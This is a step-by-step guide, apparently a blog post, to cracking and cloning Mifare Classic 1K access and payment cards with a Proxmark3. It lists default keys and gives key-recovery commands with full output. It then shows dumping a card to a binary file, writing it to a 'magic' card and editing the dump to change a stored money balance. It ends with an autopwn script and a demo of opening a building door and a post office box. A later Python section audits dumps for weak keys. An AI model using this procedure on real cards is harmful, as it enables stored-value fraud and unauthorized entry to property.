How to hack Mifare Classic 1k – all information that you need to copy and tamper with Mifare 1k
0. References:
- https://timdows.com/projects/using-a-mobile-phone-to-clone-a-mifare-card/
- https://hackerwarehouse.com/site-news/mifare-classic-partial-and-full-cloning/
- https://blog.kchung.co/rfid-hacking-with-the-proxmark-3/
- https://firefart.at/post/how-to-crack-mifare-classic-cards/
- https://www.blackhat.com/docs/sp-14/materials/arsenal/sp-14-Almeida-Hacking-MIFARE-Classic-Cards-Slides.pdf
1. Mifare Classic 1k
- High Frequency card
- Use
proxmark3> hf search
to get basic details, i.e. UID, SAK, ATQA
- Use
proxmark3> hf mf
to get more options
- The Mifare Classic uses CRYPTO1 cryptography (see the Black Hat presentation about it)
- Mifare Classic has 16 sectors, each sector has 4 blocks, each block has 16 bytes -> 1024 bytes
- In order to read a sector or a block we have to specify the key type (A or B) and the key value (12 hex digits, 0x000000000000 – 0xFFFFFFFFFFFF)
- Sector 0 contains the UID, which is usually read-only
- Most of the time, the default key value is not changed. Common default values:
ffffffffffff
a0b0c0d0e0f0
a1b1c1d1e1f1
a0a1a2a3a4a5
b0b1b2b3b4b5
4d3a99c351dd
1a982c7e459a
000000000000
d3f7d3f7d3f7
aabbccddeeff
In order to copy the card, we need to read all sectors -> dump it to a binary file -> load it to a magic card (a.k.a. Chinese Magic Card) which allows us to write to any of the sectors/blocks
The last block of each sector (the trailer) has the following format:
- first 8 bytes are the A key value
- next are the access bits
- last 8 bytes are the B key value
The other 3 blocks are filled with data.
There are 4-byte and 7-byte UID cards.
1.1 Mifare memory layout

1.2 4-byte vs. 7-byte

1.3 Sector 0 block 0 layout

2. Get basic information
This should return the type of High Frequency card, as well as UID and some other info:
proxmark3> hf search
3. Read sector data
In order to read a block or sector we need to specify the number, the key type and the key value. Usually the value is the default one (see the default key values above). Try both A and B if not sure.
proxmark3> hf mf rdsc 14 A FFFFFFFFFFFF
--sector no:14 key type:A key:ff ff ff ff ff ff
isOk:01
data : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
data : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
data : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
trailer: 00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
4. Read other keys
Some sectors/blocks may have a custom key. In order to find it, you can try using hf mf mifare
proxmark3> hf mf mifare
Executing command. Expected execution time: 25sec on average :-)
Press button on the proxmark3 device to abort both proxmark3 and client.
........
uid(4009d071) nt(867dbb16) par(8ce48c44047c047c) ks(0303030f01090d00) nr(00000000)
|diff|{nr} |ks3|ks3^5|parity |
+----+--------+---+-----+---------------+
| 00 |00000000| 3 | 6 |0,0,1,1,0,0,0,1|
| 20 |00000020| 3 | 6 |0,0,1,0,0,1,1,1|
| 40 |00000040| 3 | 6 |0,0,1,1,0,0,0,1|
| 60 |00000060| f | a |0,0,1,0,0,0,1,0|
| 80 |00000080| 1 | 4 |0,0,1,0,0,0,0,0|
| a0 |000000a0| 9 | c |0,0,1,1,1,1,1,0|
| c0 |000000c0| d | 8 |0,0,1,0,0,0,0,0|
| e0 |000000e0| 0 | 5 |0,0,1,1,1,1,1,0|
key_count:0 Key not found (lfsr_common_prefix list is null).
Nt=867dbb16 Failing is expected to happen in 25% of all cases.
Trying again with a different reader nonce... .#db#
Mifare: Can't select card ......
uid(4009d071) nt(867dbb16) par(c4dc4c443c74442c) ks(05080f07000c0000) nr(00000001)
|diff|{nr} |ks3|ks3^5|parity |
+----+--------+---+-----+---------------+
| 00 |00000001| 5 | 0 |0,0,1,0,0,0,1,1|
| 20 |00000021| 8 | d |0,0,1,1,1,0,1,1|
| 40 |00000041| f | a |0,0,1,1,0,0,1,0|
| 60 |00000061| 7 | 2 |0,0,1,0,0,0,1,0|
| 80 |00000081| 0 | 5 |0,0,1,1,1,1,0,0|
| a0 |000000a1| c | 9 |0,0,1,0,1,1,1,0|
| c0 |000000c1| 0 | 5 |0,0,1,0,0,0,1,0|
| e0 |000000e1| 0 | 5 |0,0,1,1,0,1,0,0|
key_count:1
Found valid key:12feed78beef
5. Nested keys
The nested key attack can also be used to retrieve other keys:
proxmark3> hf mf nested 1 0 a 12feed78beef t
Testing known keys. Sector count=16
nested...
uid:4009d071 trgbl=0 trgkey=1
Found valid key:45face32feed
Time in nested: 5.563 (5.563 sec per key)
6. Sector 0
Sector 0 is usually read-only and may contain data that the manufacturer doesn’t want us to change. Dumping the whole card and re-writing the wanted values to a Magic card (Chinese card) allows us to tamper with the data.
6.1 Read sector 0, Key type A, key value “12feed78beef”
proxmark3> hf mf rdsc 0 A 12feed78beef
--sector no:0 key type:A key:12 fe ed 78 be ef
db# READ SECTOR FINISHED
isOk:01
data : 40 09 d0 71 e8 88 04 00 46 8f 75 17 5d 60 28 11
data : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
data : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
trailer: 00 00 00 00 00 00 ff 07 80 69 45 fa ce 32 fe ed
6.2 Sector 0, block 0
The first 8 bytes contain data used to specify the UID, SAK and ATQA. The following 8 bytes are specific to the card:
46 8f 75 17 5d 60 28 11
7. Cloning a card
In order to clone a card, we must first read all sectors, which means finding the keys. Once we are able to read all sectors, we use the dump command to write the data to a binary file. Afterwards, we place the Magic Card on the Proxmark and restore the dumped binary onto it. Setting the UID may be needed as well.
7.1 Dump the original card to .bin and restore on the magic card
proxmark3> hf mf mifare
proxmark3> hf mf nested 1 0 A 12feed78beef
proxmark3> hf mf dump
proxmark3> hf mf restore
proxmark3> hf mf setuid 4009d071
7.2 Hexdump of dump.bin
xxd dumpdata.bin
00000000: 4009 d071 e888 0400 468f 7517 5d60 2811 @..q....F.u.]`(.
00000010: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000030: 12fe ed78 beef ff07 8069 45fa ce32 feed ...x.....iE..2..
This places the same data on the Chinese card as on the original card. If we want to tamper with the data (i.e. change the money amount stored on the card), we edit the dumpdata.bin file before restoring it. Some cards may have checksums, so it’s important to see how the bytes change by using the card a few times, dumping the data after each use, and comparing the byte values.
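As an added example (not from the original post), a Python audit of a 1K dump in the layout shown above: it parses block 0 and every sector trailer as the page's own rdsc and xxd output shows them (key A 6 bytes, access bits 4 bytes, key B 6 bytes), flags sectors that still use one of the default keys listed in section 1, rejects trailers whose inverted access-bit copies disagree, and reports the transport condition ff 07 80 69 under which key B is readable with key A (which is why the trailer reads above show key A as zeros but key B in clear). The sample dump is constructed, with sector 0 taken from the xxd output and factory-default trailers assumed for sectors 1-15.

```python
# Added example (not from the original post): audit a Mifare Classic 1K dump of
# 16 sectors x 4 blocks x 16 bytes. SAMPLE_DUMP below is constructed from the
# xxd output above (sector 0) plus factory-default trailers for sectors 1-15.
DEFAULT_KEYS = {
    "ffffffffffff", "a0b0c0d0e0f0", "a1b1c1d1e1f1", "a0a1a2a3a4a5", "b0b1b2b3b4b5",
    "4d3a99c351dd", "1a982c7e459a", "000000000000", "d3f7d3f7d3f7", "aabbccddeeff"}
BLOCK, SECTOR = 16, 64
def parse_block0(block):
    """4-byte-UID card: UID(4) BCC(1) SAK(1) ATQA(2), then 8 manufacturer bytes."""
    bcc = block[0] ^ block[1] ^ block[2] ^ block[3]  # BCC is the XOR of the UID bytes
    return {"uid": block[:4].hex(), "bcc_ok": bcc == block[4], "sak": block[5],
            "atqa": block[6:8].hex(), "mfr": block[8:].hex()}
def parse_trailer(block):
    """Trailer: key A (6 bytes), access bytes (3 + 1 user byte), key B (6 bytes)."""
    return {"key_a": block[:6].hex(), "access": block[6:10], "key_b": block[10:].hex()}

def access_bits(access):
    """(c1, c2, c3) nibbles with bit i = block i, or None when the stored inverted
    copies disagree (the chip then refuses all further access to the sector)."""
    b6, b7, b8 = access[0], access[1], access[2]
    c1, c2, c3 = b7 >> 4, b8 & 0x0F, b8 >> 4
    ok = ((b6 & 0x0F) == (~c2 & 0x0F) and (b6 >> 4) == (~c1 & 0x0F)
          and (b7 & 0x0F) == (~c3 & 0x0F))
    return (c1, c2, c3) if ok else None

def key_b_readable(bits):
    """MF1S50 trailer table: key B can be read with key A (so it is no secret) when
    block 3 has C1=0, unless C2=C3=1. ff 07 80 69 (transport config) is such a case."""
    c1, c2, c3 = ((n >> 3) & 1 for n in bits)
    return c1 == 0 and not (c2 == 1 and c3 == 1)
def audit_dump(dump):
    findings = []  # (sector, finding) pairs a card issuer would want to fix
    if not parse_block0(dump[:BLOCK])["bcc_ok"]:
        findings.append((0, "block 0 BCC does not match UID"))
    for s in range(16):
        t = parse_trailer(dump[s * SECTOR + 3 * BLOCK:(s + 1) * SECTOR])
        for k in ("key_a", "key_b"):
            if t[k] in DEFAULT_KEYS:
                findings.append((s, f"{k} is a well-known default key"))
        bits = access_bits(t["access"])
        if bits is None:
            findings.append((s, "access bits inconsistent"))
        elif key_b_readable(bits):
            findings.append((s, "key B readable with key A"))
    return findings

SECTOR0 = bytes.fromhex("4009d071e8880400468f75175d602811" + "00" * 32
                        + "12feed78beef" "ff078069" "45face32feed")
FACTORY = bytes(48) + bytes.fromhex("ffffffffffff" "ff078069" "ffffffffffff")
SAMPLE_DUMP = SECTOR0 + FACTORY * 15  # constructed 1024-byte dump
```

Running audit_dump on a dump of your own issued cards shows at a glance which sectors still carry factory keys or the transport access condition.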
8. Cracking process
8.1 Autopwn
[usb] pm3 --> script run mifare_autopwn -d


9. Demo
Opening building door and post office box using a cloned mifare classic card:
